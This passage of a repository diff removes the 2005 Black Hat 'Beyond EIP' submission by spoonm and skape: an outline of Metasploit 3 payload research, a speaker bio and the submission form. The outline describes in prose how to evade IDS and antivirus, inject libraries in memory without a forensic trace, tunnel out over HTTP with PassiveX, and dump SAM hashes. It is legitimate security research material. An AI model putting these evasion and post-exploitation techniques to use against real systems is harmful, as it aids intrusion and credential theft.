||||
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
|
||||
http://www.hick.org/code/skape/papers/meterpreter.pdf
|
||||
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
|
||||
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
|
||||
http://www.metasploit.com/users/spoonm/ordinals.txt
|
||||
|
||||
cited material:
|
||||
STRIDE:
|
||||
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
|
||||
|
||||
syscall proxy:
|
||||
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
|
||||
|
||||
|
|
@ -1,378 +0,0 @@
|
|||
04/19/2005
|
||||
|
||||
Note:
|
||||
|
||||
We've tried to include most of the topics that will be covered in our
|
||||
presentation. However, many of these things will be discussed, but will not be
|
||||
our main concentration. The majority of our presentation will be around topic
|
||||
V. C, our new post-exploitation advances, and how they will be designed and
|
||||
integrated into Metasploit 3. Metasploit 3 won't be finished in time for
|
||||
Blackhat, but more important than the software itself is the work we've done
|
||||
on developing the individual components that it will be built from.
|
||||
|
||||
This outline is pretty indepth, so it's hard to pick out all the nuggets of
|
||||
coolness. We've developed many really useful technologies in the area of
|
||||
payload development. These are things we've created since last year's
|
||||
Blackhat, including many advances in polymorphic shellcode, and
|
||||
high-permutation attacks.
|
||||
|
||||
I. Introduction
|
||||
A. Who are we?
|
||||
1. spoonm
|
||||
2. skape
|
||||
B. Exploit Technology
|
||||
1. Three Phases of Exploitation
|
||||
a. Pre-exploitation
|
||||
b. Exploitation
|
||||
c. Post-exploitation
|
||||
2. Pre-exploitation - Preparing the payload
|
||||
a. NOP generation
|
||||
b. Payload encoders
|
||||
c. Connection handler initialization
|
||||
3. Exploitation - Leveraging the vulnerability
|
||||
a. Stack overflows
|
||||
c. Heap overflows
|
||||
b. SEH overwrites
|
||||
d. Arbitrary pointer overwrites
|
||||
4. Post-Exploitation - Manipulating the target
|
||||
a. Command shell redirection
|
||||
b. Arbitrary command execution
|
||||
c. Pivoting payloads
|
||||
d. Advanced payload interaction
|
||||
B. Where do we stand?
|
||||
1. Pre-exploitation
|
||||
a. Robust and elegant encoders do exist
|
||||
i. SkyLined's alpha-numeric encoder
|
||||
ii. Spoonm's Shikata Ga Nai
|
||||
b. Payload encoders generally taken for granted
|
||||
i. Most encoders are static with a variable key
|
||||
ii. IDS able to signature static decoder stubs
|
||||
c. NOP generation hasn't publically changed much
|
||||
i. PoC exploits generally use predictable nops, if any
|
||||
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
|
||||
iii. Not considered very important to many researchers
|
||||
d. NIDS deployments are playing chase the tail
|
||||
i. The mouse always has the advantage; NIDS is reactive
|
||||
ii. Advanced nops and encoders push NIDS to its limits
|
||||
2. Exploitation
|
||||
a. Techniques have become very mature
|
||||
i. Linux/BSD exploitation techniques largely unchanged
|
||||
ii. Win32 heap overflows now more reliable (oded/shok)
|
||||
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
|
||||
b. Exploitation topics have been beaten to death
|
||||
3. Post-exploitation
|
||||
a. Common payloads are limited
|
||||
i. Command shell interaction has poor automation support
|
||||
ii. Limited to the command set that the interpreter provides
|
||||
iii. Bounded by the utilities installed on the target machine
|
||||
iv. Restrictive environments (chroot) can hinder command execution
|
||||
v. HIPS vendors becoming more adept at detecting basic payloads
|
||||
- LoadLibraryA from the stack, etc (mcafee 8.0i)
|
||||
b. Communication vectors largely unchanged
|
||||
i. Reverse and port-bind payloads still the most common
|
||||
ii. Findsock style payloads still unused by PoC exploits
|
||||
iii. Alternative communication vectors rarely discussed
|
||||
c. Pivoting technology exists
|
||||
i. Core ST described system call proxying in 2002
|
||||
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
|
||||
C. What will we discuss?
|
||||
1. Pre-exploitation Research
|
||||
a. NOP generation
|
||||
i. Opty2
|
||||
b. Encoders
|
||||
i. Additive feedback encoders
|
||||
ii. Shikata Ga Nai
|
||||
2. Post-Exploitation Research
|
||||
a. Library Injection
|
||||
i. Facilitates things like Meterpreter and VNC injection
|
||||
b. VNC Injection
|
||||
i. Introduced at blackhat04 with the Metasploit 2.2 release
|
||||
c. Meterpreter & dN
|
||||
i. The cross-platform post-exploitation suite
|
||||
3. Payload Research
|
||||
a. PassiveX
|
||||
i. Taking advantage of ActiveX controls
|
||||
b. Ordinal Stagers
|
||||
i. Tiny network capable stagers
|
||||
c. Egghunt (maybe?)
|
||||
i. Small payload capable of locating a larger payload
|
||||
ii. Useful for exploits with limited space
|
||||
II. Pre-exploitation
|
||||
A. OptyNop2
|
||||
1. Creation and benefits of multi-byte nopsleds
|
||||
B. Additive feedback encoders
|
||||
C. Shikata Ga Nai
|
||||
1. High permutation shellcode through simple dependency mappings
|
||||
III. Post-exploitation
|
||||
A. Library Injection
|
||||
1. Overview
|
||||
a. Paper published in 04/2004
|
||||
b. Provides advanced code execution
|
||||
c. Code can be written in any language that can compile down
|
||||
to a shared object.
|
||||
d. Allows developer to use all of the APIs exposed to a normal
|
||||
application.
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include lib inject paper)
|
||||
2. Two types of library injection
|
||||
a. On-Disk
|
||||
i. Library is loaded from the target's harddrive or via a
|
||||
file share.
|
||||
ii. Can be detected by AV products due to fs access
|
||||
b. In-Memory
|
||||
i. Library is uploaded to the target and loaded from memory
|
||||
without touching the disk
|
||||
ii. Evades file system filter drivers, such as those
|
||||
provided by AV companies
|
||||
iii. Not touching the disk means no forensic trace
|
||||
iv. VirtualLock prevents swapping to disk, but requires admin
|
||||
3. In-memory library injection on Windows
|
||||
a. System calls used by the library loader are hooked
|
||||
i. NtCreateFile
|
||||
ii. NtMapViewOfSection
|
||||
iii. etc
|
||||
b. Unique image name is used to identify the image to image that
|
||||
is in memory
|
||||
c. System call hooks are removed so that future injectino can
|
||||
occur
|
||||
d. Alternative approaches
|
||||
i. Could do client-side relocations, but would need to handle
|
||||
import processing
|
||||
4. In-memory library injection on Linux/BSD
|
||||
a. No known public implementations
|
||||
b. Requires alternate approach
|
||||
i. Hooking API routines not always possible -- symtab not
|
||||
mapped into memory
|
||||
ii. libc symbol version mismatches lead to linking nightmares
|
||||
c. Client-side relocations seem most feasible
|
||||
i. Remote side maps a region of memory and sends the client
|
||||
the base address
|
||||
ii. Client processes relocations and transmits the relocated
|
||||
image as its mapped segment would appear
|
||||
iii. Requires locating rtld base so that PLT lookups will
|
||||
work
|
||||
B. VNC Injection
|
||||
1. Implements VNC as an injectable DLL
|
||||
a. Uses RealVNC as the code-base
|
||||
b. VNC communication uses the exploit connection
|
||||
c. No physical trace is left of the VNC server
|
||||
d. Can operate regardless of existing VNC installations
|
||||
2. Easy way to illustrate insecurities
|
||||
a. Suits understand mouse movement better than black box command
|
||||
prompts
|
||||
C. Meterpreter
|
||||
1. Generic post-exploitation suite
|
||||
a. Based on library injection
|
||||
b. Uses the established exploit connection
|
||||
i. Especially powerful with findsock payloads; no new connection
|
||||
c. Executes entirely from memory
|
||||
d. No new processes or file access required for the payload to
|
||||
succeed
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include meterpreter paper)
|
||||
2. Extension system provides advanced automation support
|
||||
a. No need to hand write tedious assembly
|
||||
b. Existing native code can be ported to a meterpreter extension
|
||||
3. Architecture
|
||||
a. Design goals
|
||||
i. Very flexible protocol; should adapt to extension requirements
|
||||
ii. Exposure of a channelized communication system to extensions
|
||||
iii. Stealth operation
|
||||
iv. Should be portable to various operating systems
|
||||
v. Client from one platform should work with server on another
|
||||
platform
|
||||
b. Protocol
|
||||
i. Uses TLVs (Type-Length-Value) to support arbitrary data
|
||||
passing.
|
||||
ii. TLVs allow the packet parser to be oblivious to the structure
|
||||
of the value field
|
||||
iii. Type field is broken down into meta types
|
||||
4. Core interface
|
||||
a. Overview
|
||||
i. Minimal interface to support the loading of extensions
|
||||
ii. Implements the basic packet transmission and dispatching
|
||||
facilities
|
||||
iii. Exposes channel allocation and management to extensions
|
||||
b. Advanced features
|
||||
i. Migrating the server instance between processes
|
||||
5. The ``stdapi'' extension
|
||||
a. Overview
|
||||
i. Included in Metasploit 3.0
|
||||
ii. Provides access to some of the common subsystems of the
|
||||
target operating system
|
||||
iii. Allows for easy automation and implementation of robust
|
||||
post-exploitation scripts
|
||||
b. File System
|
||||
i. File and directory interaction
|
||||
ii. Files can be uploaded and downloaded between the
|
||||
attacker and the target
|
||||
c. Network
|
||||
i. Transparent network pivoting
|
||||
ii. Route table enumeration and manipulation
|
||||
iii. Local interface enumeration
|
||||
d. Process
|
||||
i. Process execution, optionally with channelized IO
|
||||
ii. Enumeration of running processes
|
||||
iii. Modification of arbitrary memory
|
||||
iv. Creation and modification of running threads
|
||||
v. Loading and interacting with shared object files
|
||||
e. Registry
|
||||
i. General registry API access
|
||||
ii. Opening, creating, and removing registry keys
|
||||
iii. Setting, querying, and deleting registry values
|
||||
iv. Enumeration of both keys and values
|
||||
f. User interface
|
||||
i. Disabling local user interaction via the keyboard
|
||||
and/or mouse (similar to VNC)
|
||||
ii. Idle timeout checking to see how long it's been
|
||||
since the user did something interactive
|
||||
6. The ``priv'' extension
|
||||
a. Still in development
|
||||
b. Exposes an interface to escalating local privileges
|
||||
through local vulnerabilities
|
||||
c. SAM dumping support similar to pwdump3
|
||||
D. dN
|
||||
1. Simple low-footprint post-exploitation tool
|
||||
2. Useful to scope out execution enviroment, then bootstrap other tools
|
||||
IV. Payload Research
|
||||
A. PassiveX
|
||||
1. Overview
|
||||
a. Post-exploitation payload
|
||||
b. A derivative of On-Disk library injection that uses
|
||||
ActiveX controls
|
||||
c. Supports arbitrary DLL injection in any language that can
|
||||
be compiled as an ActiveX control (C++, VB, etc)
|
||||
d. Detailed analysis can be found in included resources
|
||||
(include passivex paper)
|
||||
2. Payload Implementation
|
||||
a. Disables iexplore Internet zone restrictions on
|
||||
ActiveX controls
|
||||
i. Modifies four registry values that are stored per-user
|
||||
b. Launches a hidden iexplore at a URL with an embedded
|
||||
OCX
|
||||
i. The OCX does not have to be signed
|
||||
ii. No user interaction is required
|
||||
iii. OCX is automatically downloaded, registered, and loaded
|
||||
into the browser's context
|
||||
3. Sample HTTP tunneling ActiveX control
|
||||
a. HTTP GET/POST used to build tunnel to attacker
|
||||
i. Uses the WININET API
|
||||
ii. Outbound traffic from target machine encapsulated in POST
|
||||
request
|
||||
iii. Inbound traffic from attacker encapsulated in GET response
|
||||
iv. Proxy configuration automatically inherited
|
||||
v. Requires HTTP server capable of performing encap/decap on the
|
||||
HTTP packets
|
||||
b. Streaming connection through HTTP tunnel can be created
|
||||
i. socketpair doesn't exist natively on win32 but can be simulated
|
||||
with a local listener
|
||||
ii. Streaming abstraction allows advanced payloads to transparently
|
||||
use the HTTP transport (Meterpreter, VNC)
|
||||
iii. Local listener less covert, but highly beneficial
|
||||
4. Pros
|
||||
a. Bypasses restrictive outbound filters
|
||||
b. Re-uses proxy configuration
|
||||
c. Looks like normal user traffic
|
||||
d. Allows full access to the win32 API like all forms of
|
||||
library injection
|
||||
5. Cons
|
||||
a. Touches the disk
|
||||
b. Requires administrative access
|
||||
i. Internet Explorer prohibits the downloading of
|
||||
ActiveX controls as non-admin
|
||||
B. Windows Ordinal Stagers
|
||||
1. Overview
|
||||
a. Technique from Oded's lightning talk from core04
|
||||
b. Uses static ordinals to locate winsock symbol addresses
|
||||
c. Compatible with all versions of Windows
|
||||
d. 92 byte reverse stager, 93 byte findsock stager
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include spoonm ordinal paper)
|
||||
2. Reverse Ordinal Stager
|
||||
a. Walks InitOrderModuleList searching for ws2_32
|
||||
b. Uses static ordinals to index the export table
|
||||
c. Creates fd with socket
|
||||
d. Chains connect and recv frames
|
||||
e. Returns into buffer read in from file descriptor
|
||||
C. Egghunting
|
||||
1. Overview
|
||||
a. Small stub payload that can search for a larger payload
|
||||
b. Useful for exploits that have limited payload space but can
|
||||
stash more payload elsewhere in memory
|
||||
c. Example exploits include the IE object type vulnerability.
|
||||
d. Goal is to safely search target address space for the larger
|
||||
payload.
|
||||
e. Larger payload is located by searching for an egg that is prepended
|
||||
to it.
|
||||
f. Detailed analysis can be found in included resources
|
||||
(include egghunt paper)
|
||||
2. Two primary methods of egghunting on Windows
|
||||
a. SEH
|
||||
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
|
||||
versions of Windows (including 9x)
|
||||
2. Installs a custom exception handler
|
||||
3. Begins walking the address space
|
||||
i. When a bad address is encounter, the current pointer is
|
||||
incremented by PAGE_SIZE
|
||||
ii. When a mismatch of the egg is encountered, the current pointer
|
||||
is incremented by one
|
||||
4. Each address is compared against the 8-byte egg
|
||||
i. Bad addresses will throw exceptions which will be handled
|
||||
by the custom exception handler
|
||||
5. When the egg is found, jump past the egg into the larger payload
|
||||
b. System call
|
||||
1. Very small stub (32 bytes), searches for an 8 byte egg, only
|
||||
compatible with NT+
|
||||
2. Uses a non-intrusive system call (NtDisplayString) to search validate
|
||||
addresses
|
||||
i. Same page walking logic as SEH is used
|
||||
3. When the egg is found, jump past the egg into the larger payload
|
||||
3. One primary method of egghunting on Linux
|
||||
a. System call
|
||||
1. 30 bytes in size, searches for an 8 byte egg
|
||||
2. System call technique applies to other UNIX variants as well
|
||||
3. Uses the sigaction system call to validate 16 bytes at once
|
||||
4. Pros
|
||||
i. Very small
|
||||
5. Cons
|
||||
i. Corner cases may cause it to be unstable
|
||||
V. The Complete Picture - Metasploit 3.0
|
||||
A. The power of pre-exploitation prepartion
|
||||
1. Abstract NOP generation
|
||||
2. Abstract payload encoding
|
||||
3. Abstract exploit connection handlers
|
||||
i. Bind handler
|
||||
ii. Reverse handler
|
||||
iii. Findsock handler
|
||||
B. The power of exploit generalization
|
||||
1. Standardized exploit creation interface
|
||||
i. Robust target definitions
|
||||
ii. Detailed exploit implementation information
|
||||
iii. Entirely payload independent, no hardcoding paylaods
|
||||
C. The power of post-exploitation automation
|
||||
1. Complicated tasks made simple with scripting
|
||||
i. Want to download a targets entire harddrive?
|
||||
ii. Want to disable local user interaction?
|
||||
iii. Want to upload and play an mp3 on the target?
|
||||
iv. Want to 'be' on the target's network?
|
||||
2. Standard interface means cross platform support
|
||||
VI. Conclusion - where do we go from here?
|
||||
A. Future Post-exploitation research
|
||||
1. Mesh network support
|
||||
2. Expansion of the stdapi described in this document
|
||||
|
||||
included resources:
|
||||
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
|
||||
http://www.hick.org/code/skape/papers/meterpreter.pdf
|
||||
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
|
||||
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
|
||||
http://www.metasploit.com/users/spoonm/ordinals.txt
|
||||
|
||||
cited material:
|
||||
STRIDE:
|
||||
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
|
||||
|
||||
syscall proxy:
|
||||
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
|
||||
|
||||
|
|
@ -1,7 +0,0 @@
|
|||
Skape is a lead software developer by day and an independent security researcher
|
||||
by night. He joined forces with the Metasploit project in 2004 where his many
|
||||
contributions have included the Meterpreter, VNC injection, and many other
|
||||
payload advances. Skape has worked on a number of open-source projects and has
|
||||
authored several papers on security related technologies. His current security
|
||||
related intrerests include post-exploitation technologies, payload development
|
||||
and optimization, and exploitation prevention technology.
|
|
@ -1,673 +0,0 @@
|
|||
Date of Submission:
|
||||
|
||||
04/2005
|
||||
|
||||
I would like to present this at:
|
||||
|
||||
USA 2005
|
||||
|
||||
Personal Information
|
||||
|
||||
Primary Speaker Name:
|
||||
|
||||
spoonm
|
||||
|
||||
Primary Speaker Title (if applicable):
|
||||
|
||||
Additional Speaker Name(s), Title(s) and Company(s) (if applicable):
|
||||
|
||||
skape
|
||||
|
||||
Speaking on Behalf of:
|
||||
|
||||
Primary Contact's Email:
|
||||
|
||||
spoonm@gmail.com
|
||||
|
||||
Primary Contact's Telephone:
|
||||
|
||||
Speaker's Email (if different from the primary speaker's email):
|
||||
|
||||
Speaker's Telephone (if different from the primary speaker's telephone):
|
||||
|
||||
Has the speaker spoken at a previous Black Hat event? Yes or No
|
||||
|
||||
Yes
|
||||
|
||||
Does the speaker have any professional speaking experience? Yes or No
|
||||
|
||||
Yes
|
||||
|
||||
If yes, please list the three most recent engagements.
|
||||
|
||||
- cansecwest 2005
|
||||
- defcon 2004
|
||||
- blackhat 2004
|
||||
|
||||
Has or will this presentation be seen in any form? If so, explain how this
|
||||
presentation is different from previous versions, and where/when this material
|
||||
has been seen before.
|
||||
|
||||
No
|
||||
|
||||
Will or has the speaker(s) be presenting at ANY event 30 days prior to this
|
||||
conference? If yes, please specify which event and on what topic(s).
|
||||
|
||||
No
|
||||
|
||||
Presentation Information
|
||||
|
||||
Name of Presentation:
|
||||
|
||||
- Beyond EIP
|
||||
|
||||
Select the track(s) that your talk would be most appropriate for your topic (you
|
||||
must select at least one of the nine):
|
||||
|
||||
- Deep Knowledge
|
||||
- 0 Day Attack
|
||||
|
||||
How much time does your presentation require? 75 minutes, 90 minutes or 20
|
||||
minutes (turbo track) (please specify)
|
||||
|
||||
90 minutes (could do 75 if necessary)
|
||||
|
||||
What are the three most important reasons why this is a quality Black Hat talk?
|
||||
|
||||
Reason 1:
|
||||
|
||||
Although we continue to publicly release much of our work, there is much
|
||||
more involved under the hood than just what's released. Blackhat is the
|
||||
perfect venue to discuss our ideas, research, design, and development in
|
||||
detail. It's really important to be able to discuss the sort of things we've
|
||||
thought very hard about and to present the conclusions that would otherwise
|
||||
be taken for granted.
|
||||
|
||||
Reason 2:
|
||||
|
||||
The technology discussed in this presentation impacts a wide number of
|
||||
security related fields including NIDS, HIPS, Anti-Virus, penetration
|
||||
testing, and the exploit development cycle in general.
|
||||
|
||||
Reason 3:
|
||||
|
||||
Many of the audience members can't be fully engaged in the deep world of
|
||||
security research. This is a chance for them to get a "view from the
|
||||
trenches", and see what's actually happening on the attacker security front.
|
||||
Audience members will get an idea of where technologies currently stand, how
|
||||
they work, and what might be in store for the future.
|
||||
|
||||
Is there a demonstration? Yes or No
|
||||
|
||||
Yes
|
||||
|
||||
Are the speaker(s) releasing a new tool? Yes or No
|
||||
|
||||
Possibly, or will talk about many recent (within a year) releases.
|
||||
|
||||
Are the speaker(s) releasing a new exploit? Yes or No
|
||||
|
||||
No
|
||||
|
||||
Is there audience participation? Yes or No
|
||||
|
||||
No
|
||||
|
||||
What are your equipment needs?
|
||||
|
||||
1 projector.
|
||||
|
||||
Will you require more than 2 lcd projectors? Yes or No - if yes, please specify
|
||||
how many
|
||||
|
||||
No
|
||||
|
||||
Will you require internet access? Yes or No
|
||||
|
||||
No
|
||||
|
||||
Will you require a white board? Yes or No
|
||||
|
||||
No
|
||||
|
||||
Will you require any special equipment? Yes or No - if yes, please specify.
|
||||
|
||||
No
|
||||
|
||||
Detailed Outline:
|
||||
|
||||
Note:
|
||||
|
||||
We've tried to include most of the topics that will be covered in our
|
||||
presentation. However, many of these things will be discussed, but will not be
|
||||
our main concentration. The majority of our presentation will be around topic
|
||||
V. C, our new post-exploitation advances, and how they will be designed and
|
||||
integrated into Metasploit 3. Metasploit 3 won't be finished in time for
|
||||
Blackhat, but more important than the software itself is the work we've done
|
||||
on developing the individual components that it will be built from.
|
||||
|
||||
This outline is pretty indepth, so it's hard to pick out all the nuggets of
|
||||
coolness. We've developed many really useful technologies in the area of
|
||||
payload development. These are things we've created since last year's
|
||||
Blackhat, including many advances in polymorphic shellcode, and
|
||||
high-permutation attacks.
|
||||
|
||||
I. Introduction
|
||||
A. Who are we?
|
||||
1. spoonm
|
||||
2. skape
|
||||
B. Exploit Technology
|
||||
1. Three Phases of Exploitation
|
||||
a. Pre-exploitation
|
||||
b. Exploitation
|
||||
c. Post-exploitation
|
||||
2. Pre-exploitation - Preparing the payload
|
||||
a. NOP generation
|
||||
b. Payload encoders
|
||||
c. Connection handler initialization
|
||||
3. Exploitation - Leveraging the vulnerability
|
||||
a. Stack overflows
|
||||
c. Heap overflows
|
||||
b. SEH overwrites
|
||||
d. Arbitrary pointer overwrites
|
||||
4. Post-Exploitation - Manipulating the target
|
||||
a. Command shell redirection
|
||||
b. Arbitrary command execution
|
||||
c. Pivoting payloads
|
||||
d. Advanced payload interaction
|
||||
B. Where do we stand?
|
||||
1. Pre-exploitation
|
||||
a. Robust and elegant encoders do exist
|
||||
i. SkyLined's alpha-numeric encoder
|
||||
ii. Spoonm's Shikata Ga Nai
|
||||
b. Payload encoders generally taken for granted
|
||||
i. Most encoders are static with a variable key
|
||||
ii. IDS able to signature static decoder stubs
|
||||
c. NOP generation hasn't publically changed much
|
||||
i. PoC exploits generally use predictable nops, if any
|
||||
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
|
||||
iii. Not considered very important to many researchers
|
||||
d. NIDS deployments are playing chase the tail
|
||||
i. The mouse always has the advantage; NIDS is reactive
|
||||
ii. Advanced nops and encoders push NIDS to its limits
|
||||
2. Exploitation
|
||||
a. Techniques have become very mature
|
||||
i. Linux/BSD exploitation techniques largely unchanged
|
||||
ii. Win32 heap overflows now more reliable (oded/shok)
|
||||
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
|
||||
b. Exploitation topics have been beaten to death
|
||||
3. Post-exploitation
|
||||
a. Common payloads are limited
|
||||
i. Command shell interaction has poor automation support
|
||||
ii. Limited to the command set that the interpreter provides
|
||||
iii. Bounded by the utilities installed on the target machine
|
||||
iv. Restrictive environments (chroot) can hinder command execution
|
||||
v. HIPS vendors becoming more adept at detecting basic payloads
|
||||
- LoadLibraryA from the stack, etc (mcafee 8.0i)
|
||||
b. Communication vectors largely unchanged
|
||||
i. Reverse and port-bind payloads still the most common
|
||||
ii. Findsock style payloads still unused by PoC exploits
|
||||
iii. Alternative communication vectors rarely discussed
|
||||
c. Pivoting technology exists
|
||||
i. Core ST described system call proxying in 2002
|
||||
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
|
||||
C. What will we discuss?
|
||||
1. Pre-exploitation Research
|
||||
a. NOP generation
|
||||
i. Opty2
|
||||
b. Encoders
|
||||
i. Additive feedback encoders
|
||||
ii. Shikata Ga Nai
|
||||
2. Post-Exploitation Research
|
||||
a. Library Injection
|
||||
i. Facilitates things like Meterpreter and VNC injection
|
||||
b. VNC Injection
|
||||
i. Introduced at blackhat04 with the Metasploit 2.2 release
|
||||
c. Meterpreter & dN
|
||||
i. The cross-platform post-exploitation suite
|
||||
3. Payload Research
|
||||
a. PassiveX
|
||||
i. Taking advantage of ActiveX controls
|
||||
b. Ordinal Stagers
|
||||
i. Tiny network capable stagers
|
||||
c. Egghunt (maybe?)
|
||||
i. Small payload capable of locating a larger payload
|
||||
ii. Useful for exploits with limited space
|
||||
II. Pre-exploitation
|
||||
A. OptyNop2
|
||||
1. Creation and benefits of multi-byte nopsleds
|
||||
B. Additive feedback encoders
|
||||
C. Shikata Ga Nai
|
||||
1. High permutation shellcode through simple dependency mappings
|
||||
III. Post-exploitation
|
||||
A. Library Injection
|
||||
1. Overview
|
||||
a. Paper published in 04/2004
|
||||
b. Provides advanced code execution
|
||||
c. Code can be written in any language that can compile down
|
||||
to a shared object.
|
||||
d. Allows developer to use all of the APIs exposed to a normal
|
||||
application.
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include lib inject paper)
|
||||
2. Two types of library injection
|
||||
a. On-Disk
|
||||
i. Library is loaded from the target's harddrive or via a
|
||||
file share.
|
||||
ii. Can be detected by AV products due to fs access
|
||||
b. In-Memory
|
||||
i. Library is uploaded to the target and loaded from memory
|
||||
without touching the disk
|
||||
ii. Evades file system filter drivers, such as those
|
||||
provided by AV companies
|
||||
iii. Not touching the disk means no forensic trace
|
||||
iv. VirtualLock prevents swapping to disk, but requires admin
|
||||
3. In-memory library injection on Windows
|
||||
a. System calls used by the library loader are hooked
|
||||
i. NtCreateFile
|
||||
ii. NtMapViewOfSection
|
||||
iii. etc
|
||||
b. Unique image name is used to identify the image to image that
|
||||
is in memory
|
||||
c. System call hooks are removed so that future injectino can
|
||||
occur
|
||||
d. Alternative approaches
|
||||
i. Could do client-side relocations, but would need to handle
|
||||
import processing
|
||||
4. In-memory library injection on Linux/BSD
|
||||
a. No known public implementations
|
||||
b. Requires alternate approach
|
||||
i. Hooking API routines not always possible -- symtab not
|
||||
mapped into memory
|
||||
ii. libc symbol version mismatches lead to linking nightmares
|
||||
c. Client-side relocations seem most feasible
|
||||
i. Remote side maps a region of memory and sends the client
|
||||
the base address
|
||||
ii. Client processes relocations and transmits the relocated
|
||||
image as its mapped segment would appear
|
||||
iii. Requires locating rtld base so that PLT lookups will
|
||||
work
|
||||
B. VNC Injection
|
||||
1. Implements VNC as an injectable DLL
|
||||
a. Uses RealVNC as the code-base
|
||||
b. VNC communication uses the exploit connection
|
||||
c. No physical trace is left of the VNC server
|
||||
d. Can operate regardless of existing VNC installations
|
||||
2. Easy way to illustrate insecurities
|
||||
a. Suits understand mouse movement better than black box command
|
||||
prompts
|
||||
C. Meterpreter
|
||||
1. Generic post-exploitation suite
|
||||
a. Based on library injection
|
||||
b. Uses the established exploit connection
|
||||
i. Especially powerful with findsock payloads; no new connection
|
||||
c. Executes entirely from memory
|
||||
d. No new processes or file access required for the payload to
|
||||
succeed
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include meterpreter paper)
|
||||
2. Extension system provides advanced automation support
|
||||
a. No need to hand write tedious assembly
|
||||
b. Existing native code can be ported to a meterpreter extension
|
||||
3. Architecture
|
||||
a. Design goals
|
||||
i. Very flexible protocol; should adapt to extension requirements
|
||||
ii. Exposure of a channelized communication system to extensions
|
||||
iii. Stealth operation
|
||||
iv. Should be portable to various operating systems
|
||||
v. Client from one platform should work with server on another
|
||||
platform
|
||||
b. Protocol
|
||||
i. Uses TLVs (Type-Length-Value) to support arbitrary data
|
||||
passing.
|
||||
ii. TLVs allow the packet parser to be oblivious to the structure
|
||||
of the value field
|
||||
iii. Type field is broken down into meta types
|
||||
4. Core interface
|
||||
a. Overview
|
||||
i. Minimal interface to support the loading of extensions
|
||||
ii. Implements the basic packet transmission and dispatching
|
||||
facilities
|
||||
iii. Exposes channel allocation and management to extensions
|
||||
b. Advanced features
|
||||
i. Migrating the server instance between processes
|
||||
5. The ``stdapi'' extension
|
||||
a. Overview
|
||||
i. Included in Metasploit 3.0
|
||||
ii. Provides access to some of the common subsystems of the
|
||||
target operating system
|
||||
iii. Allows for easy automation and implementation of robust
|
||||
post-exploitation scripts
|
||||
b. File System
|
||||
i. File and directory interaction
|
||||
ii. Files can be uploaded and downloaded between the
|
||||
attacker and the target
|
||||
c. Network
|
||||
i. Transparent network pivoting
|
||||
ii. Route table enumeration and manipulation
|
||||
iii. Local interface enumeration
|
||||
d. Process
|
||||
i. Process execution, optionally with channelized IO
|
||||
ii. Enumeration of running processes
|
||||
iii. Modification of arbitrary memory
|
||||
iv. Creation and modification of running threads
|
||||
v. Loading and interacting with shared object files
|
||||
e. Registry
|
||||
i. General registry API access
|
||||
ii. Opening, creating, and removing registry keys
|
||||
iii. Setting, querying, and deleting registry values
|
||||
iv. Enumeration of both keys and values
|
||||
f. User interface
|
||||
i. Disabling local user interaction via the keyboard
|
||||
and/or mouse (similar to VNC)
|
||||
ii. Idle timeout checking to see how long it's been
|
||||
since the user did something interactive
|
||||
6. The ``priv'' extension
|
||||
a. Still in development
|
||||
b. Exposes an interface to escalating local privileges
|
||||
through local vulnerabilities
|
||||
c. SAM dumping support similar to pwdump3
|
||||
D. dN
|
||||
1. Simple low-footprint post-exploitation tool
|
||||
2. Useful to scope out execution enviroment, then bootstrap other tools
|
||||
IV. Payload Research
|
||||
A. PassiveX
|
||||
1. Overview
|
||||
a. Post-exploitation payload
|
||||
b. A derivative of On-Disk library injection that uses
|
||||
ActiveX controls
|
||||
c. Supports arbitrary DLL injection in any language that can
|
||||
be compiled as an ActiveX control (C++, VB, etc)
|
||||
d. Detailed analysis can be found in included resources
|
||||
(include passivex paper)
|
||||
2. Payload Implementation
|
||||
a. Disables iexplore Internet zone restrictions on
|
||||
ActiveX controls
|
||||
i. Modifies four registry values that are stored per-user
|
||||
b. Launches a hidden iexplore at a URL with an embedded
|
||||
OCX
|
||||
i. The OCX does not have to be signed
|
||||
ii. No user interaction is required
|
||||
iii. OCX is automatically downloaded, registered, and loaded
|
||||
into the browser's context
|
||||
3. Sample HTTP tunneling ActiveX control
|
||||
a. HTTP GET/POST used to build tunnel to attacker
|
||||
i. Uses the WININET API
|
||||
ii. Outbound traffic from target machine encapsulated in POST
|
||||
request
|
||||
iii. Inbound traffic from attacker encapsulated in GET response
|
||||
iv. Proxy configuration automatically inherited
|
||||
v. Requires HTTP server capable of performing encap/decap on the
|
||||
HTTP packets
|
||||
b. Streaming connection through HTTP tunnel can be created
|
||||
i. socketpair doesn't exist natively on win32 but can be simulated
|
||||
with a local listener
|
||||
ii. Streaming abstraction allows advanced payloads to transparently
|
||||
use the HTTP transport (Meterpreter, VNC)
|
||||
iii. Local listener less covert, but highly beneficial
|
||||
4. Pros
|
||||
a. Bypasses restrictive outbound filters
|
||||
b. Re-uses proxy configuration
|
||||
c. Looks like normal user traffic
|
||||
d. Allows full access to the win32 API like all forms of
|
||||
library injection
|
||||
5. Cons
|
||||
a. Touches the disk
|
||||
b. Requires administrative access
|
||||
i. Internet Explorer prohibits the downloading of
|
||||
ActiveX controls as non-admin
|
||||
B. Windows Ordinal Stagers
|
||||
1. Overview
|
||||
a. Technique from Oded's lightning talk from core04
|
||||
b. Uses static ordinals to locate winsock symbol addresses
|
||||
c. Compatible with all versions of Windows
|
||||
d. 92 byte reverse stager, 93 byte findsock stager
|
||||
